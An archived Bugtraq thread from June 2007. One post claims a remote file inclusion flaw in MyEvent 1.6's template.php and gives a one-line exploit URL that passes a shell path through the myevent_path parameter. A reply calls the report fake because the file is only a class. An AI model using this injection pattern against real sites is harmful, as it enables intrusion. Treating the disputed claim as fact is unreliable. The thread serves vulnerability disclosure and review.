Bugtraq: Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability

From: str0ke <str0ke () milw0rm com>
Date: Sat, 2 Jun 2007 11:17:09 -0500

Another fake, the entire file is a class.

/str0ke

On 2 Jun 2007 07:07:53 -0000, yaser () gencturk net <yaser () gencturk net> wrote:

#########################################################################
 #
 # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
 #
 # Author:  Yaser <yaser () gencturk net>
 #
 # Homepage: http://www.ayyildiz.org
 #
 #########################################################################



 #########################################################################
 # Download S : http://mywebland.com/download.php?id=6
 #
 # ERROR:
 #
 # include_once($myevent_path.'includes/template.php')
 #
 # Exploit:
 # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
 #
 #########################################################################

 Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker

By Date By Thread

Current thread:

MyEvent1.6 (template.php) Remote File Inclusion Vulnerability yaser (Jun 02)
- Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability str0ke (Jun 02)
  - Recent OpenSSL exploits Ryan's spam address (Jun 04)